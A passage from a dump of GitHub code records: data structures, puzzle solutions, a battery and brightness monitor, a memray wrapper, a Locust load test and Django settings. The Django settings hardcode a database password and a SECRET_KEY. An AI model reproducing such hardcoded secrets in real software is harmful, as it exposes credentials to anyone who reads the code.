(ls+1) / (ls+rs+1+1)\n if diff > 1-self.ALPHA:\n assert l\n l = l.copy()\n l.right = self._merge_with_root(l.right, root, r)\n self._update(l)\n if not (self.ALPHA <= l.balance() <= 1-self.ALPHA):\n return self._balance_left(l)\n return l\n if diff < self.ALPHA:\n assert r\n r = r.copy()\n r.left = self._merge_with_root(l, root, r.left)\n self._update(r)\n if not (self.ALPHA <= r.balance() <= 1-self.ALPHA):\n r = self._balance_right(r)\n return r\n return r\n root = root.copy()\n root.left = l\n root.right = r\n self._update(root)\n return root\n\n def _merge_node(self, l: Optional[Node], r: Optional[Node]) -> Optional[Node]:\n if l is None and r is None:\n return None\n if l is None:\n assert r\n return r.copy()\n if r is None:\n return l.copy()\n l = l.copy()\n r = r.copy()\n l, root = self._pop_right(l)\n return self._merge_with_root(l, root, r)\n\n def merge(self, other: 'PersistentWBTreeList') -> 'PersistentWBTreeList':\n root = self._merge_node(self.root, other.root)\n return self._new(root)\n\n def _pop_right(self, node: Node) -> Tuple[Node, Node]:\n path = []\n node = node.copy()\n mx = node\n while node.right is not None:\n path.append(node)\n node = node.right.copy()\n mx = node\n path.append(node.left.copy() if node.left else None)\n for _ in range(len(path)-1):\n node = path.pop()\n if node is None:\n path[-1].right = None\n self._update(path[-1])\n continue\n b = node.balance()\n if self.ALPHA <= b <= 1-self.ALPHA:\n path[-1].right = node\n elif b > 1-self.ALPHA:\n path[-1].right = self._balance_right(node)\n else:\n path[-1].right = self._balance_left(node)\n self._update(path[-1])\n if path[0] is not None:\n b = path[0].balance()\n if b > 1-self.ALPHA:\n path[0] = self._balance_right(path[0])\n elif b < self.ALPHA:\n path[0] = self._balance_left(path[0])\n mx.left = None\n self._update(mx)\n return path[0], mx\n\n def _split_node(self, node: Optional[Node], k: int) -> Tuple[Optional[Node], Optional[Node]]:\n if node is None:\n return None, None\n tmp = k if node.left is None else k-node.left.size\n l, r = None, None\n if tmp == 0:\n return node.left, self._merge_with_root(None, node, node.right)\n elif tmp < 0:\n l, r = self._split_node(node.left, k)\n return l, self._merge_with_root(r, node, node.right)\n else:\n l, r = self._split_node(node.right, tmp-1)\n return self._merge_with_root(node.left, node, l), r\n\n def split(self, k: int) -> 
Tuple['PersistentWBTreeList', 'PersistentWBTreeList']:\n l, r = self._split_node(self.root, k)\n return self._new(l), self._new(r)\n\n def _new(self, root: Optional['PersistentWBTreeList.Node']) -> 'PersistentWBTreeList':\n return PersistentWBTreeList([], root)\n\n def insert(self, k: int, key: T) -> 'PersistentWBTreeList':\n s, t = self._split_node(self.root, k)\n root = self._merge_with_root(s, PersistentWBTreeList.Node(key), t)\n return self._new(root)\n\n def pop(self, k: int) -> Tuple['PersistentWBTreeList', T]:\n s, t = self._split_node(self.root, k+1)\n assert s\n s, tmp = self._pop_right(s)\n root = self._merge_node(s, t)\n return self._new(root), tmp.key\n\n def set(self, k: int, v: T) -> 'PersistentWBTreeList':\n if k < 0:\n k += len(self)\n node = self.root.copy()\n root = node\n pnode = None\n d = 0\n while True:\n assert node\n t = 0 if node.left is None else node.left.size\n if t == k:\n node = node.copy()\n node.key = v\n if d:\n pnode.left = node\n else:\n pnode.right = node\n return self._new(root)\n pnode = node\n if t < k:\n k -= t + 1\n node = node.right.copy()\n d = 0\n else:\n d = 1\n node = node.left.copy()\n if d:\n pnode.left = node\n else:\n pnode.right = node\n\n def copy(self) -> 'PersistentWBTreeList':\n root = self.root.copy() if self.root else None\n return self._new(root)\n\n def tolist(self) -> List[T]:\n node = self.root\n stack = []\n a = []\n while stack or node:\n if node:\n stack.append(node)\n node = node.left\n else:\n node = stack.pop()\n a.append(node.key)\n node = node.right\n return a\n\n def __getitem__(self, k: int) -> T:\n if k < 0:\n k += len(self)\n node = self.root\n while True:\n assert node\n t = 0 if node.left is None else node.left.size\n if t == k:\n return node.key\n elif t < k:\n k -= t + 1\n node = node.right\n else:\n node = node.left\n\n def __len__(self):\n return 0 if self.root is None else self.root.size\n\n def __str__(self):\n return '[' + ', '.join(map(str, self.tolist())) + ']'\n\n def __repr__(self):\n return f'PersistentWBTreeList({self})'\n\n","repo_name":"titanium-22/Library_py","sub_path":"DataStructures/WBTree/PersistentWBTreeList.py","file_name":"PersistentWBTreeList.py","file_ext":"py","file_size_in_byte":7973,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"19207524648","text":"class Solution:\n def canReach(self, arr: List[int], start: int) -> bool:\n def visit(index: int) -> bool:\n if 0 <= index < size and index not in visited:\n value = arr[index]\n if value == 0:\n return True\n else:\n visited.add(index)\n if visit(index + arr[index]):\n return True\n if visit(index - arr[index]):\n return True\n return False\n size = len(arr)\n visited = set()\n return visit(start)\n \n","repo_name":"michaelhuo/pcp","sub_path":"1306.py","file_name":"1306.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"73806850170","text":"import time\nimport signal\nimport os\nfrom tkinter import *\nfrom evdev import InputDevice\n\n\nclass BatteryInfo:\n def __init__(self):\n # 1 - AC . 
0 - battery\n self.mode = 1\n self.capacity = 100\n self.hours_remain = 2\n self.minutes_remain = 2\n self.brightness_at_start = 100\n self.brightness_in_powersafe_mode = int(self.brightness_at_start / 2)\n self.brightness = 100\n self.get_brightness_at_start()\n # in seconds\n self.dim_time = 5\n\n def get_power_type(self):\n uevent = open(\"/sys/class/power_supply/AC/uevent\")\n online_string = uevent.read()\n self.mode = int(online_string[-2:])\n if self.mode == 1:\n text.insert(INSERT, \"AC mode\")\n text.insert(INSERT, '\\n')\n else:\n text.insert(INSERT, \"Battery mode\")\n text.insert(INSERT, '\\n')\n uevent.close()\n\n def get_capacity(self):\n capacity = open(\"/sys/class/power_supply/BAT0/capacity\")\n self.capacity = int(capacity.read())\n text.insert(INSERT, \"Capacity: \" + str(self.capacity) + \"%\")\n text.insert(INSERT, '\\n')\n capacity.close()\n\n def get_estimated_time(self):\n if self.mode == 0:\n charge_now_file = open(\"/sys/class/power_supply/BAT0/charge_now\")\n current_now_file = open(\"/sys/class/power_supply/BAT0/current_now\")\n\n charge_now_int = int(charge_now_file.read())\n current_now_int = int(current_now_file.read())\n\n if current_now_int != 0:\n time_remain = divmod(charge_now_int, current_now_int)\n self.hours_remain = time_remain[0]\n self.minutes_remain = int((charge_now_int / current_now_int - self.hours_remain) * 60)\n text.insert(INSERT, \"Time to full discharge: \" + \"0\" + \":\" + str(self.minutes_remain))\n text.insert(INSERT, '\\n')\n\n charge_now_file.close()\n current_now_file.close()\n\n def get_brightness_at_start(self):\n brightness = open(\"/sys/class/backlight/nv_backlight/brightness\")\n self.brightness_at_start = int(brightness.read())\n self.brightness = self.brightness_at_start\n brightness.close()\n\n # you need rights to write to brightness file\n def set_powersafe_brightness(self):\n brightness = open(\"/sys/class/backlight/nv_backlight/brightness\", \"w\")\n brightness.write(str(self.brightness_in_powersafe_mode))\n self.brightness = self.brightness_in_powersafe_mode\n #brightness.close()\n\n def set_original_brightness(self):\n os.system(\"xset dpms force on\")\n brightness = open(\"/sys/class/backlight/nv_backlight/brightness\", \"w\")\n brightness.write(str(self.brightness_at_start))\n self.brightness = self.brightness_at_start\n brightness.close()\n\ntop = Tk()\ntext = Text(top)\nfield = Entry()\ntext.pack()\nfield.pack()\ninfo = BatteryInfo()\ndata_update_time = 3\ndim_time = 5\ndev = InputDevice('/dev/input/event0')\ndev2 = InputDevice('/dev/input/event6')\n\ndef signal_handler(signal, frame):\n text.insert(INSERT, 'Backlight settings were restored')\n text.insert(INSERT, '\\n')\n info.set_original_brightness()\n dev.close()\n dev2.close()\n sys.exit(0)\n\ndef loop(count_time, dim_flag, dim_start_time, start_time, event_flag):\n keyboard_event = dev.read_one()\n mouse_event = dev2.read_one()\n\n if field.get() != \"\":\n\n dim_time = int(field.get())\n\n if keyboard_event is not None and mouse_event is not None and event_flag is False:\n dim_start_time = time.time()\n\n # turn off dim\n if info.mode == 0 and info.brightness != info.brightness_at_start and dim_flag is True:\n info.set_original_brightness()\n dim_start_time = time.time()\n dim_flag = False\n\n # change brightness according to the current battery mode\n if info.mode == 1 and info.brightness != info.brightness_at_start:\n info.set_original_brightness()\n\n if info.mode == 0 and info.brightness != info.brightness_in_powersafe_mode \\\n and dim_start_time + 
dim_time < time.time() and dim_flag is False:\n os.system(\"xset dpms force off\")\n info.set_powersafe_brightness()\n dim_start_time = time.time()\n dim_flag = True\n\n if time.time() > count_time + data_update_time:\n count_time = time.time()\n info.get_power_type()\n info.get_capacity()\n info.get_estimated_time()\n\n top.after(100, loop, count_time, dim_flag, dim_start_time, start_time, event_flag)\n\n\n\nif __name__ == '__main__':\n text.insert(INSERT, dev2)\n text.insert(INSERT, '\\n')\n\n signal.signal(signal.SIGINT, signal_handler)\n start_time = time.time()\n dim_start_time = time.time()\n count_time = time.time() - data_update_time\n dim_flag = False\n event_flag = False\n\n loop(count_time, dim_flag, dim_start_time, start_time, event_flag)\n top.mainloop()\n\n\n","repo_name":"AnastasiaAndruhovich550503/Battery","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"71540385533","text":"import pickle\nimport numpy\n\n\ndef load_word_embeddings(path):\n words, embeddings = pickle.load(open(path, 'rb'), encoding='latin1')\n print(\"Emebddings shape is {}\".format(embeddings.shape))\n return words, embeddings\n\n\ndef load_treebanks(path):\n data = None\n with open(path, 'r') as f:\n data = f.read().split('\\n')\n\n return data\n\n\ndef train_test_split(data, train_size, dev_size, test_size):\n n = len(data)\n n_train = int(n*train_size )\n n_dev = int(n*(train_size + dev_size))\n\n train_data = data[:n_train]\n dev_data = data[n_train:n_dev]\n test_data = data[n_dev:]\n\n return train_data, dev_data, test_data\n","repo_name":"gabrielbarcik/CYKparser","sub_path":"loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"11452130913","text":"from aocd import data, submit\n\n\ndef chunks(L, n):\n \"\"\" Yield successive n-sized chunks from L.\n \"\"\"\n for i in range(0, len(L), n):\n yield L[i:i+n]\n\n\ndef get_num_count(data, num):\n return len(list(filter(lambda x: x == num, data)))\n\n\nif __name__ == '__main__':\n dimx = 25\n dimy = 6\n\n layer_pixels = dimx * dimy\n layers = [chunk for chunk in chunks(data, layer_pixels)]\n\n min_count = float('inf')\n min_layer = None\n for layer in layers:\n zero_count = get_num_count(layer, '0')\n if zero_count < min_count:\n min_count = zero_count\n min_layer = layer\n\n # print(f'{min_count} {get_num_count(min_layer, \"1\") * get_num_count(min_layer, \"2\")}')\n submit(get_num_count(min_layer, \"1\") * get_num_count(min_layer, \"2\"))","repo_name":"tomsajan/aoc","sub_path":"2019/advent_2019_08a.py","file_name":"advent_2019_08a.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"39151324661","text":"import os\nimport os.path\nimport socket\n\nPROJECT_PATH = os.path.abspath(os.path.split(__file__)[0])\nMY_IP = socket.gethostbyaddr(socket.gethostname())[2][0]\nMY_HOSTNAME = socket.gethostbyaddr(socket.gethostname())[0]\n\nDEBUG = False\nTEMPLATE_DEBUG = DEBUG\n\nif TEMPLATE_DEBUG == True:\n TEMPLATE_STRING_IF_INVALID = \"TEMPLATE_INVALID\"\n\nADMINS = (\n (\"Philipp Wollermann\", \"philipp@igowo.de\"),\n)\n\nMANAGERS = ADMINS\n\nDEFAULT_FROM_EMAIL = \"pysk@%s\" % (MY_HOSTNAME,)\nSERVER_EMAIL = DEFAULT_FROM_EMAIL\n\nDATABASE_ENGINE = 'postgresql_psycopg2' # 'postgresql_psycopg2', 
'postgresql', 'mysql', 'sqlite3' or 'oracle'.\nDATABASE_NAME = 'pysk' # Or path to database file if using sqlite3.\nDATABASE_USER = 'pysk' # Not used with sqlite3.\nDATABASE_PASSWORD = 'z62VUW2m59Y69u99'\nDATABASE_HOST = '' # Set to empty string for localhost. Not used with sqlite3.\nDATABASE_PORT = '' # Set to empty string for default. Not used with sqlite3.\n\nTIME_ZONE = 'Europe/Berlin'\nLANGUAGE_CODE = 'de-de'\n\n_ = lambda s: s\n\nLANGUAGES = (\n ('de', _('German')),\n ('en', _('English')),\n)\n\nUSE_I18N = True\n\n# MEDIA_* settings are only relevant for uploaded files,\n# specifically fields of type FileField and ImageField!\nMEDIA_ROOT = os.path.join(PROJECT_PATH, '../uploads')\nMEDIA_URL = '/uploads/'\nSTATIC_ROOT = os.path.join(PROJECT_PATH, '../static')\nSTATIC_URL = '/static/'\nADMIN_MEDIA_PREFIX = '/static/admin/'\n\nSECRET_KEY = 'xgYRsDMhGsnjubsP1JwT9b6ux6teGVLedHEJywNtIsMQKxgK'\n\nSEND_BROKEN_LINK_EMAILS = not DEBUG\nAPPEND_SLASH = False\nPREPEND_WWW = False\nUSE_ETAGS = True\n\nROOT_URLCONF = 'pysk.urls'\n\nLOGIN_URL = \"/accounts/login/\"\nLOGIN_REDIRECT_URL = \"/admin/\"\nACCOUNT_ACTIVATION_DAYS = 14\n\n\n# List of callables that know how to import templates from various sources.\nTEMPLATE_LOADERS = (\n 'django.template.loaders.filesystem.load_template_source',\n 'django.template.loaders.app_directories.load_template_source',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.auth.middleware.RemoteUserMiddleware',\n 'django.middleware.transaction.TransactionMiddleware',\n)\n\nTEMPLATE_CONTEXT_PROCESSORS = (\n \"django.core.context_processors.auth\",\n \"django.core.context_processors.debug\",\n \"django.core.context_processors.i18n\",\n \"django.core.context_processors.media\",\n \"django.core.context_processors.request\",\n)\n\nTEMPLATE_DIRS = (\n \"/opt/pysk/pysk/templates\",\n)\n\nAUTHENTICATION_BACKENDS = (\n 'django.contrib.auth.backends.RemoteUserBackend',\n)\n\nINSTALLED_APPS = (\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.admin',\n 'django.contrib.webdesign',\n 'django_extensions',\n 'pysk.app',\n 'pysk.vps',\n)\n","repo_name":"philwo/pysk","sub_path":"pysk/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2918,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"74124078972","text":"# Name: Intouch Srijumnong (Indy)\n# worked with JT\n\n# Constant\nG = 6.674e-11 # m^3 * kg^-1 * s^-2\nM = 5.974e24 # kg\nm = 7.348e22 # kg\nR = 3.844e8 # m\nw = 2.662e-6 # s^-1\n\n\n# a\n# Define Newton's universal law of gravitation as given\ndef G_law(r):\n return (G * M / r ** 2) - (G * m / (R - r) ** 2) - (w ** 2 * r)\n\n\n# b\n# Using secant method to solve for distance r\ndef secant():\n r1 = 3.0e4 # Starting values for secant method\n r2 = 3.0e6\n for x in range(20):\n r = r2 - G_law(r2) * (r2 - r1) / (G_law(r2) - G_law(r1))\n r1 = r2\n r2 = r\n return (r)\n\n\ndistance = secant()\nprint(\"L1 = \", distance, \"meters away from Earth\")\n","repo_name":"dgrin1/indy_hw","sub_path":"srijumnong_intouch_indy_hw8_6.16.py","file_name":"srijumnong_intouch_indy_hw8_6.16.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"22962417642","text":"\"\"\"\nCRACKING THE CODING INTERVIEW\n3.3. 
Stacks of plates:\nImagine a (literal) stack of plates. If the stack gets too high,\nit might topple. Therefore, in real life, we would likely start\na new stack when the previous stack exceeds some threshold.\nImplement a data structure `SetOfStacks` that mimics this.\n`SetOfStacks` should be composed of several stacks and should create\na new stack once the previous one exceeds capacity.\n`SetOfStacks.push()` and `SetOfStacks.pop()` should behave identically\nto a single stack (that is, pop() should return the same values\nas it would if there were just a single stack).\n\"\"\"\nfrom dataclasses import dataclass\n\n\n@dataclass\nclass StackNode:\n data: int\n next = None\n\n\nclass Stack:\n def __init__(self) -> None:\n self.top = None\n self.size = 0\n\n def push(self, data: int):\n node = StackNode(data)\n node.next = self.top\n self.top = node\n self.size += 1\n\n def peek(self) -> int:\n if self.top is None:\n return None\n return self.top.data\n\n def pop(self) -> int:\n if self.top is None:\n raise ValueError(\"The stack is empty, `pop()` failed\")\n data = self.top.data\n self.top = self.top.next\n self.size -= 1\n return data\n\n\n@dataclass\nclass SetOfStacks:\n capacity: int\n\n def __post_init__(self) -> None:\n self.stacks = []\n\n def push(self, data: int):\n if len(self.stacks) == 0 or self.stacks[-1].size >= self.capacity:\n self.stacks.append(Stack())\n\n self.stacks[-1].push(data)\n\n def peek(self):\n if len(self.stacks) == 0:\n return None\n return self.stacks[-1].peek()\n\n def pop(self) -> int:\n if len(self.stacks) == 0:\n raise ValueError(\"The stacks are empty\")\n\n data = self.stacks[-1].pop()\n\n if self.stacks[-1].size == 0:\n self.stacks.pop()\n\n return data\n\n\nif __name__ == \"__main__\":\n print(\"-\" * 60)\n print(\"SET OF STACKS\")\n print(\"-\" * 60)\n\n stack = SetOfStacks(capacity=2)\n print(\"\\nPushing data into the SetOfStacks...\")\n for i in range(5, 10):\n print(f\"Current number of stacks: {len(stack.stacks)}\")\n stack.push(i)\n print(f\"stack.push({i})\")\n print(f\"Current number of stacks: {len(stack.stacks)}\")\n print(f\"stack.peek() = {stack.peek()}\", stack.peek() == i)\n print()\n\n print(\"\\nPopping data from the SetOfStacks...\")\n for i in range(4):\n print(f\"Current number of stacks: {len(stack.stacks)}\")\n data = stack.pop()\n print(f\"stack.pop() = {data}\")\n print(f\"Current number of stacks: {len(stack.stacks)}\")\n print(f\"stack.peek() = {stack.peek()}\", stack.peek() == 8 - i)\n print()\n\n print(f\"Current number of stacks: {len(stack.stacks)}\")\n data = stack.pop()\n print(f\"stack.pop() = {data}\")\n print(f\"stack.peek() = {stack.peek()}\", stack.peek() is None)\n print(f\"Current number of stacks: {len(stack.stacks)}\")\n","repo_name":"daalgi/algorithms","sub_path":"stacks/stack_of_plates.py","file_name":"stack_of_plates.py","file_ext":"py","file_size_in_byte":3013,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"3140961714","text":"# BOJ 14470\nimport sys\n\nsi = sys.stdin.readline\n\ninit_temp = int(si())\ntarget_temp = int(si())\nf_time = int(si())\ndefrost_time = int(si())\nn_time = int(si())\ncur_temp = init_temp\ntime = 0\nfrozen = True\nwhile True:\n if target_temp == cur_temp:\n print(time)\n break\n if cur_temp < 0:\n cur_temp += 1\n time += f_time\n elif frozen and cur_temp == 0:\n frozen = False\n time += defrost_time\n else:\n cur_temp += 1\n time += 
n_time\n","repo_name":"mrbartrns/algorithm-and-structure","sub_path":"BOJ/simulation_boj/micro_wave.py","file_name":"micro_wave.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"27525663771","text":"class Rectangle:\n def __init__(self, width, height, color):\n self.width = width\n self.heigh = height\n self.color = color\n\n def getArea(self):\n area = self.width * self.heigh\n return area\n\n def getPerimeter(self):\n perimeter = (self.width + self.heigh)*2\n return perimeter\n\n#...\n\ncurtain = Rectangle (2, 3, 'verde')\nmonitor = Rectangle (1, 1, 'negro')\npool = Rectangle(15, 25, 'azul')\n\nprint('La cortina es de color {}.'.format(curtain.color))\nprint('El área del monitor es {} metros cuadrados.'.format(monitor.getArea()))\nx = pool.getPerimeter()\nprint (x)","repo_name":"roy-marquez/_IntroProg","sub_path":"s10/oop_rectangle.py","file_name":"oop_rectangle.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"73800953212","text":"from functools import partial\nfrom typing import Any, Dict\n\nfrom django.db import models\n\nfrom factory import Factory\nfrom factory.base import StubObject\nfrom factory.faker import faker\n\n\nFAKER = faker.Faker()\n\n\n# https://github.com/FactoryBoy/factory_boy/issues/68#issuecomment-636452903\ndef generate_dict_factory(the_factory: Factory):\n def convert_dict_from_stub(stub: StubObject) -> Dict[str, Any]:\n stub_dict = stub.__dict__\n for key, value in stub_dict.items():\n if isinstance(value, StubObject):\n stub_dict[key] = convert_dict_from_stub(value)\n elif isinstance(value, models.Model): # Patch for user_id\n stub_dict[key] = value.pk\n return stub_dict\n\n def dict_factory(the_factory, **kwargs):\n stub = the_factory.stub(**kwargs)\n stub_dict = convert_dict_from_stub(stub)\n return stub_dict\n\n return partial(dict_factory, the_factory)\n","repo_name":"hectorcanto/fictional-demo-api","sub_path":"tests/factories/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"42429310112","text":"import subprocess\nimport re\n\n\nclass MemrayProfile:\n\n def _call_cmd(self, cmd_string):\n \"\"\"\n Takes a string and runs it using the appropriate args for subprocess.run in this context.\n Returns the CompletedProcess object when the subprocess completes.\n \"\"\"\n print('Running cmd: ' + cmd_string)\n return subprocess.run(cmd_string.split(' '), capture_output=True, text=True)\n\n def _construct_run_cmd(self,\n python_file_to_profile,\n output_file=None,\n input_args=None,\n overwrite_file=True):\n \"\"\"\n Constructs the correct string to run memray given the passed args.\n\n Args:\n python_file_to_profile (str): Path to the python file you'd like memray to run and profile for you\n output_file (str): Path to the file you'd like memray to put it's results in (MUST end in '.bin')\n input_args (str): Space-separated string with the args you'd like passed to the file being profiled.\n e.g. if you want to call 'myfile.py arg1 arg2', you'd pass 'arg1 arg2' to this kwarg.\n overwrite_file (bool): Whether to overwrite the destination file if it exists. 
If you aren't\n passing an output_file arg, memray will automatially generate a new output filename so this\n arg won't matter.\n\n Returns:\n A strings, to be passed to _call_cmd.\n \"\"\"\n cmd = 'memray run'\n if overwrite_file:\n cmd += ' -f'\n if output_file:\n cmd += f' -o {output_file}'\n cmd += ' ' + str(python_file_to_profile)\n if input_args:\n cmd += ' ' + input_args\n return cmd\n\n def _parse_run_output(self, completed_process_object):\n \"\"\"\n Takes the results of a memray run (run via _call_cmd) and parses the stdout to get useful info.\n\n Args:\n completed_process_object (CompletedProcess): A subprocess.CompletedProcess obj. Must have\n been run with capture_output and text flags set to True.\n\n Returns:\n A tuple, with two values:\n - Whether or not memray successfully wrote results to the file\n - The output file string (mainly useful if you didn't pass a custom output file arg.)\n \"\"\"\n printout = completed_process_object.stdout\n print(\"===== Printing RUN output ================= \")\n print(printout)\n if type(printout) != str:\n print(\"Error: Must run command with subprocess.run([...], capture_output=True, text=True)\")\n output_file_match = re.search('Writing profile results into ([^\\n]+)', printout)\n output_file = None if not output_file_match else output_file_match.group(1)\n # successfully_wrote_results = 1 if re.search('[memray] Successfully generated profile results.', printout) else 0\n # if not successfully_wrote_results:\n # raise OSError('Error on memray run: ' + printout)\n return 1, output_file\n\n def _construct_flamegraph_cmd(self,\n memray_results_file,\n output_file=None):\n \"\"\"\n Constructs the correct string to make a memray flamegraph given the passed args.\n\n Args:\n memray_results_file (str): Path to the memray output file you'd like to make a flamegraph for\n output_file (str): Path to the file you'd like memray to put it's results in (MUST end in '.bin')\n\n Returns:\n A string, to be passed to _call_cmd.\n \"\"\"\n cmd = 'memray flamegraph -f'\n if output_file:\n cmd += f' -o {output_file}'\n cmd += ' ' + str(memray_results_file)\n return cmd\n\n def _parse_flamegraph_output(self, completed_process_object):\n \"\"\"\n Takes the results of a memray flamegraph (run via _call_cmd) and parses the stdout to get useful info.\n Args:\n completed_process_object (CompletedProcess): A subprocess.CompletedProcess obj. 
Must have\n been run with capture_output and text flags set to True.\n Returns:\n A tuple, with two values:\n - Whether or not memray successfully wrote results to the file\n - The output file string (mainly useful if you didn't pass a custom output file arg.)\n \"\"\"\n printout = completed_process_object.stdout\n print(\"===== Printing FLAMEGRAPH output ================= \")\n print(printout)\n if type(printout) != str:\n print(\"Error: Must run command with subprocess.run([...], capture_output=True, text=True)\")\n output_file_match = re.search('Wrote ([^\\n]+)', printout)\n output_file = None if not output_file_match else output_file_match.group(1)\n return output_file is not None, output_file\n\n def do_memray_run(self,\n python_file_to_profile,\n output_file=None,\n input_args=None):\n cmd_string = self._construct_run_cmd(python_file_to_profile,\n output_file=output_file,\n input_args=input_args)\n run_completed_process = self._call_cmd(cmd_string)\n successfully_wrote_results, run_output_file = self._parse_run_output(run_completed_process)\n if not successfully_wrote_results:\n raise Exception('Failed to profile program')\n print('Run complete. Runfile written to ' + run_output_file + '.')\n return successfully_wrote_results, run_output_file\n\n def do_memray_flamegraph(self, memray_results_file, output_file=None):\n cmd = self._construct_flamegraph_cmd(memray_results_file, output_file=output_file)\n print('Running flamegraph creation cmd: ' + cmd)\n completed_process = self._call_cmd(cmd)\n succeeded, output_file = self._parse_flamegraph_output(completed_process)\n if succeeded:\n print('Flamegraph generated for ' + memray_results_file + '. Flamegraph at ' + output_file)\n return succeeded, output_file\n\n def profile_and_render_flamegraph(self,\n python_file_to_profile,\n output_file_base=None,\n input_args=None):\n \"\"\"\n Takes a python program plus cmdline args to pass to it; does a memray profile run, creates a\n flamegraph of the result, and displays the graph.\n\n Usage\n =====\n mr = MemrayProfile()\n mr.profile_program_and_display_flamegraph('file_to_profile.py', input_args='--output outputfile.txt')\n \"\"\"\n if not output_file_base:\n output_file_base = python_file_to_profile.replace('.py', '') + '__' + re.sub('[-_ .]', '_', input_args)\n run_output_file = output_file_base + '_mr_output.bin'\n flamegraph_output_file = output_file_base + '_flamegraph.html'\n\n run_succeeded, _ = self.do_memray_run(python_file_to_profile,\n output_file=run_output_file,\n input_args=input_args)\n flamegraph_succeeded, flamegraph_output_file_parsed = self.do_memray_flamegraph(run_output_file,\n output_file=flamegraph_output_file)\n print('Program ' + python_file_to_profile + ' profiled!')\n print('Memray output at ' + run_output_file + '; flamegraph at ' + flamegraph_output_file)\n return (run_output_file, flamegraph_output_file)\n","repo_name":"qbatten/ezprof","sub_path":"src/ez_memprof/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"28599285737","text":"from .base import *\nfrom rdkit.Chem import AllChem as chem\nfrom rdkit.DataStructs.cDataStructs import ExplicitBitVect\n\n\nPACKING_DIM = 64\n\nclass LSTM(EmbeddableModel):\n def __init__(self,\n device: torch.device,\n embedding_dim: int = 16,\n num_layer: int = 1,\n **kwargs\n ):\n super().__init__(device)\n self.embedding_dim = embedding_dim\n self.num_layer = num_layer\n\n self.seq = nn.LSTM(\n 
input_size=PACKING_DIM,\n hidden_size=embedding_dim,\n num_layers=num_layer,\n batch_first=True\n )\n self.fc = nn.Linear(\n in_features=embedding_dim,\n out_features=2\n )\n\n @staticmethod\n def decode_data(data: torch.Tensor, device: torch.device, **kwargs) -> torch.Tensor:\n return data.to(device)\n\n @staticmethod\n def process(mol: Mol, device: torch.device, **kwargs) -> torch.Tensor:\n bitvect = chem.RDKFingerprint(mol).ToBitString()\n vec = torch.tensor(list(\n map(float, bitvect)\n ), device=device)\n return vec.reshape(-1, PACKING_DIM)\n\n def embed(self, data: torch.Tensor) -> torch.Tensor:\n output, _ = self.seq(data[None, :])\n return output[0][-1]\n\n def forward(self, data):\n vec = self.embed(data)\n return self.fc(vec)\n","repo_name":"riteme/property-prediction","sub_path":"src/models/lstm.py","file_name":"lstm.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74751461371","text":"from locust import FastHttpUser, task\n\n\nclass BinanceUser(FastHttpUser):\n\n host = 'https://testnet.binance.vision'\n\n @task\n def get_depth_100(self):\n symbol = 'ETHBTC'\n limit = 100\n url = f\"/api/v3/depth?symbol={symbol}&limit={limit}\"\n response = self.client.get(url=url)\n\n @task\n def get_depth_500(self):\n symbol = 'ETHBTC'\n limit = 500\n url = f\"/api/v3/depth?symbol={symbol}&limit={limit}\"\n response = self.client.get(url=url)\n\n @task\n def get_depth_1000(self):\n symbol = 'ETHBTC'\n limit = 1000\n url = f\"/api/v3/depth?symbol={symbol}&limit={limit}\"\n response = self.client.get(url=url)\n\n @task\n def get_depth_5000(self):\n symbol = 'ETHBTC'\n limit = 5000\n url = f\"/api/v3/depth?symbol={symbol}&limit={limit}\"\n response = self.client.get(url=url)\n","repo_name":"lisitsas/konomic_test","sub_path":"locustfile.py","file_name":"locustfile.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74121898812","text":"\"\"\"Define your architecture here.\"\"\"\nimport torch\nfrom torch import nn,optim\nimport argparse\nfrom models import SimpleNet,get_xception_based_model\n\nfrom utils import load_dataset, load_model\nimport torch.nn.functional as F\nfrom trainer import LoggingParameters, Trainer\n\n# class myNet(nn.Module):\n# \"\"\"Simple Convolutional and Fully Connect network.\"\"\"\n#\n# def __init__(self):\n# super().__init__()\n# self.conv1 = nn.Conv2d(3, 6, kernel_size=5, stride=1, padding=2)\n# self.pool = nn.MaxPool2d(2, 2)\n# self.conv2 = nn.Conv2d(6, 16, kernel_size=5, stride=1, padding=2)\n# self.conv3 = nn.Conv2d(16, 24, kernel_size=5, stride=1, padding=2)\n# self.fc1 = nn.Linear(24 * 26 * 26, 1024)\n# self.fc2 = 